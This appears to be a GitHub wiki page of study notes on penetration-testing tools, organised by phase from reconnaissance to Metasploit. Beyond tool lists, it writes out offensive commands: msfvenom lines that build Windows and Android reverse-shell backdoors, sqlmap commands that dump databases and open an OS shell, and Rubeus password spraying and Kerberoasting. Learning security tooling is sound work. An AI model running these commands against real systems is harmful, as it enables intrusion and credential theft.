
Ethical Hacking Tools 💻~( _ ~)

Christian Urcuqui edited this page Apr 13, 2022 · 141 revisions

Reconnaissance - Intelligence gathering

Footprinting

  • sublist3r
  • Netcraft.com
  • pentest-tools.com
  • Intelius, pipl, BeenVerified, Whitepages, and PeekYou are people-search sites that look up individuals on social networks
  • theHarvester is an open-source intelligence tool that performs enumeration on LinkedIn and other websites
  • Shodan
  • Censys
  • sherlock.py is a project to footprint social networking sites
  • telnet
  • Burp Suite, Zaproxy, WhatWeb, BuiltWith, Wappalyzer
  • Web Data Extractor and ParseHub are web spiders oriented to collecting information from the target website
  • HTTrack Web Site Copier and NCollector Studio allow us to download a website to a local directory
  • Octoparse, Netpeak Spider, and Link Extractor extract links from the target website
  • CeWL gathers a word list from the target website
  • Foca, Metagoofil, Exiftool, and Web Data Extractor are tools for extracting metadata and hidden information
  • WebSite-Watcher and VisualPing allow us to detect changes or updates in a target website
  • Web-Stat, Alexa, and Monitis collect information about the target company's website traffic (e.g. total visitors, page views, among others)
  • eMailTrackerPro, Infoga, and Mailtrack are email tracking tools
  • DNSdumpster.com, Bluto, and Domain Dossier are pages to extract DNS information
  • dnsrecon is a tool for doing reverse DNS lookups
  • traceroute (linux), tracert (win), tcptraceroute, Path Analyzer Pro, VisualRoute, Traceroute NG, and PingPlotter
  • Maltego
  • Recon-ng is a web reconnaissance framework
  • OSRFramework
  • Recon-Dog
  • BillCipher
  • The3Inspector, Raccoon, Orb, PENTMENU

Scanning

Network scanning refers to a set of procedures used for identifying hosts, ports, and services in a network. It is important to mention that the scanning methodologies are based on either vertical analysis (the services of a host) or horizontal analysis (the devices of a network).

Directory

  • gobuster

Files

NMAP

The network mapper

Scripts

  • nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP to analyze> ... enumerates NetBIOS/SMB shares and users
  • nmap --script firewalk --traceroute <target> ... passing a firewall and scanning a target (the firewalk script requires --traceroute)
  • nmap --script banner <target> ... banner grabbing
  • nmap -sI <zombie IP> <target> ... idle (zombie) scanning
  • nmap -sP <network range> ... ping sweep (-sP is the older alias of -sn)
  • metasploit
  • NetScanToolsPro
  • Unicornscan
  • SolarWinds Port Scanner
  • PRTG Network Monitor
  • OmniPeek Network Protocol Analyzer

Ping Sweep

  • Angry IP Scanner
  • Colasoft
  • Visual Ping Tester
  • OpUtils

For Mobile

  • IP Scanner, for iOS scans
  • Fing, iOS and Android
  • Network Scanner, it is an Android app

WordPress Security Scanner

  • wpscan
  • N-Stalker

Web Server Reconnaissance

  • Skipfish

Footprinting a Web Server

  • httprecon, banner grabbing Windows tool
  • ID Serve, banner grabbing Windows tool

Fingerprinting

  • uniscan

Analysis and reports

  • OWASP Zap
  • Vega
  • Acunetix Web Vulnerability Scanner (WVS) - Windows tool

Enumeration

Windows

  • Global Network Inventory (GNI)
  • Ipscan25.exe
  • SuperScan 4.1
  • Hyena
  • NetBIOS enumerator
  • nmap Scripting Engine (NSE)
  • PowerView.ps1; after importing it we can use the following commands
    • Get-NetUser | select cn, enumerates the users
  • mimikatz.exe is a post-exploitation tool for dumping user credentials inside an Active Directory network
  • nbtstat is a Windows utility that displays NetBIOS over TCP/IP information for local and remote computers

Enumerating User Accounts

  • PsExec is a lightweight Telnet replacement that can execute processes on other systems.

Enumerating Shared Resources

  • net view is a command-line utility that displays a list of computers in a specified workgroup

Simple Network Management Protocol (SNMP) Enumeration

Lightweight Directory Access Protocol (LDAP) Enumeration

Network Time Protocol (NTP) Enumeration

  • ntptrace traces a chain of NTP servers back to the primary source
  • ntpdc
  • ntpq
  • ntpdate
  • PRTG network monitor
  • Nmap, Wireshark, udp-proto-scanner, and NTP Server Scanner

Network File System (NFS) Enumeration

Simple Mail Transfer Protocol Enumeration

SMTP servers respond differently to the VRFY, EXPN, and RCPT TO commands for valid and invalid users. Tools such as Metasploit, Nmap, NetScanTools Pro, and smtp-user-enum use this behaviour to collect a list of valid users, delivery addresses, message recipients, etc.

DNS Enumeration Using Zone Transfer

  • nslookup, dig, and DNSRecon; if zone transfers are enabled on the target name server, it will provide the DNS information, otherwise it returns an error saying the zone transfer failed or was refused

DNS Cache Snooping

  • Attackers perform DNS cache snooping using various tools such as the dig command, DNS Snoop Dogg, and DNSRecon.

DNSSec Zone Walking

  • Attackers use tools such as LDNS and DNSRecon to exploit this weakness, obtain the network information of a target domain, and further launch Internet-based attacks

IPsec Enumeration

  • nmap
  • ike-scan, it discovers IKE hosts and can fingerprint them using the retransmission backoff pattern

VoIP Enumeration

  • Svmap and metasploit

Remote Procedure Call (RPC) Enumeration

  • nmap
  • NetScanTools Pro

Telnet Enumeration

  • nmap

Server Message Block (SMB) Enumeration

  • Nmap, SMBMap, enum4linux, nullinux, and NetScanTools Pro

FTP and Trivial File Transfer Protocol (TFTP) Enumeration

  • nmap, metasploit, PortQry

IPv6 Enumeration

  • Enyx and IPv6 Hackit

Border Gateway Protocol (BGP) Enumeration

  • Nmap and BGP Toolkit

Linux

  • Bloodhound / SharpHound

Resources for Vulnerability Research

  • Microsoft Vulnerability Research (MSVR)
  • Dark Reading
  • SecurityTracker
  • Trend Micro
  • Security Magazine
  • PenTest Magazine
  • SC Magazine
  • Exploit Database
  • SecurityFocus
  • Help Net Security
  • HackerStorm
  • Computerworld

Vulnerability Analysis

  • Qualys - license
  • Nessus - license
  • Nikto, it is an open-source web server scanner
  • GFI Languard
  • OpenVAS
  • Qualys FreeScan
  • Acunetix Web Vulnerability Scanner
  • ManageEngine Vulnerability Manager Plus
  • Microsoft Baseline Security Analyzer (MBSA)

Vulnerability Assessment Tools for Mobile

  • Vulners Scanner
  • Security Metrics Mobile

Malware

Virus

Virus Maker

  • JPS Virus Maker 3.0
  • Internet Worm Maker Thing

Malware Analysis Tools

Static

Disassembling and Debugging Tools

  • IDA
  • OllyDbg is a debugger for binary code analysis when the source code is not available

Dynamic

Registry Monitoring Tools

  • regshot is an interesting tool that allows us to compare the changes in registry entries after installing/uninstalling a program

Port Monitoring Tools

  • TCP View
  • CurrPorts

Anti-Virus Software

  • ClamWin

Windows Startup Programs Monitoring Tools

  • Autoruns
  • WinPatrol

Registry Monitoring Tools

  • jv16 Power Tools

Password Cracking Tools

Windows

  • pwdump7 is a useful tool to get the password hashes from the Security Account Manager (SAM); it requires administrator privileges
  • L0phtCrack is a tool designed to audit and recover passwords
  • ophcrack is a Windows password cracker based on rainbow tables. It comes with a Graphical User Interface and runs on multiple platforms
  • CertUtil and Get-FileHash are commands that allow us to retrieve various checksums of files
  • Mimikatz (https://github.com)
  • Powershell Empire (https://github.com)
  • DSInternals PowerShell (https://github.com)
  • Ntdsxtract (https://github.com)
  • Kerbrute is a tool to brute-force user discovery and passwords, and even to password spray, against Kerberos (the authentication service of Active Directory)
  • Rubeus is a powerful tool for attacking Kerberos
    • Rubeus.exe harvest /interval:30 ... this command harvests TGTs every 30 seconds
    • Rubeus.exe brute /password:Password1 /noticket ... sprays a password
    • Rubeus.exe kerberoast ... Kerberoasting

LLMNR/NBT-NS Spoofing Tool

  • Responder

Pass the Ticket Attack

  • Mimikatz, Rubeus, and Windows Credentials Editor

Linux

  • John
  • hydra

Online Tools to Search Default Passwords

Password Recovery Tools

Tools to Detect LLMNR/NBT-NS Poisoning

  • Vindicate
  • got-responded

Buffer Overflow Detection Tools

Privilege Escalation

  • Using Spectre and Meltdown vulnerabilities; these are vulnerabilities found in the design of modern processor chips.
    • Spectre exploits speculative execution to read restricted data (information disclosure)
    • Meltdown accesses out-of-bounds memory by exploiting CPU optimization mechanisms such as speculative execution (privilege escalation)
  • Using Named Pipe Impersonation through Metasploit
  • Find SUID binaries: find / -perm -u=s -type f 2>/dev/null
  • Find SGID binaries: find / -perm -g=s -type f 2>/dev/null
  • BeRoot checks common misconfigurations
  • linpostexp obtains detailed information on the kernel

  • Windows Exploit Suggester

Using DLL Hijacking

  • Robber and PowerSploit

Using Dylib Hijacking

  • Dylib Hijack Scanner and DylibHijack, for OS X

Tools for Defending Against DLL and Dylib Hijacking

  • Dependency Walker, DLL Hijack Audit Kit, and DLLSpy

Tools for Detecting Spectre and Meltdown Vulnerabilities

  • InSpectre, Spectre & Meltdown Checker, INTEL-SA-00075 Detection and Mitigation Tool, etc.

Tools for Executing Apps

Cryptography

MD5 Hash Calculator

  • HashTool (windows tool)

Decipher

  • hashid is a useful tool to identify the algorithm that was used to generate a hash

Malware

Trojans

Remote Access Trojans (RAT)

  • njRAT
  • Theef

Sniffing Tools

  • Wireshark
  • Colasoft Capsa (license) is an interesting tool with descriptive information and some visualizations of a network data capture
  • Cain & Abel (Windows tool) is a password recovery tool with which we can perform MITM attacks, for example using ARP poisoning

Spoofing Detection Tools

  • XArp is a security application that detects ARP-based attacks

Spoofing MAC Address

  • SMAC (Windows - License)

Social Engineering Tools

  • The Social Engineering Toolkit (SET) is an open-source Python-driven tool with utilities for spear-phishing attacks, website attacks, and others.

DoS & DDoS

  • metasploit
  • hping3
  • High Orbit Ion Cannon (HOIC) is a network stress and DoS/DDoS attack application that sends HTTP POST and GET requests to a target computer

Stego Analysis

  • binwalk
  • steghide is one of the most famous steganography tools, but it only processes jpg files
  • zsteg is a good tool to process different kinds of data, especially png files
  • Stegoveritas supports a lot of image formats
  • Sonic Visualiser
  • exiftool allows us to check the metadata of any image file

Detection Tools

  • WAFW00F - Web Application Firewall (WAF) Detection Tool

IDS

  • SNORT

HoneyPots

Medium

  • HoneyBOT is a useful honeypot for network security research or as part of an IDS defensive solution

Bypassing Network Defensive Mechanisms

  • HTTPort is a tool that implements HTTP/FTP tunneling

Databases

  • SQLMap:
    • sqlmap -r <request file> --tamper=space2comment --dump-all --dbms sqlite
    • sqlmap -u "<URL to attack>" --cookie="<cookie copied>" --dbs
    • sqlmap -u "<URL to attack>" --cookie="<cookie>" --os-shell

Metasploit

Msfvenom gives us access to all payloads available in the Metasploit framework; moreover, it lets us create other payloads.

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe

msfvenom -p php/meterpreter/reverse_tcp lhost=<ip_host> lport=4444 -f raw

use exploit/multi/handler

msfvenom -l

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk

searchsploit linux kernel 4.8.0

searchsploit -m <code>

run post/multi/recon/local_exploit_suggester

Wireless Networks

  • Aircrack-ng

Cryptography

  • HashCalc calculates one-way hashes
  • CryptoForge is a tool that allows us to encrypt things using strong encryption algorithms
  • BCTextEncoder is a way to encode and decode text data
  • VeraCrypt is a tool used for on-the-fly encryption (OTFE); it can create a virtual encrypted disk within a file
  • CrypTool allows us to apply cryptographic mechanisms

Censorship Circumvention Tools

  • Alkasir is a cross-platform, open-source, and robust website censorship circumvention tool
  • Tails is a live operating system that a user can start on any computer using a peripheral device

Anonymizers

  • Whonix is a desktop operating system for security and privacy
  • Psiphon is software that allows anyone to surf the Internet through a secure proxy

Anonymizers for Mobile

  • Orbot is a proxy app that uses Tor to encrypt Internet traffic and then hide it
  • Psiphon uses VPN, SSH, and HTTP proxy technology that allow us to access open and uncensored Internet content.
  • OpenDoor is an iPhone and iPad app

Network Discovery and Mapping Tools

Network Discovery Tools for Mobile

Yara

  • LOKI is a free open-source IOC (Indicator of Compromise) scanner created/written by Florian Roth.
  • THOR Lite is Florian's newest multi-platform IOC AND YARA scanner.
  • FENRIR
  • YAYA was created by the EFF (Electronic Frontier Foundation) and released in September 2020.
  • Valhalla (a web solution) https://www.nextron-systems.com/valhalla/

Other tools

  • Impacket is a collection of Python classes for working with network protocols, available on GitHub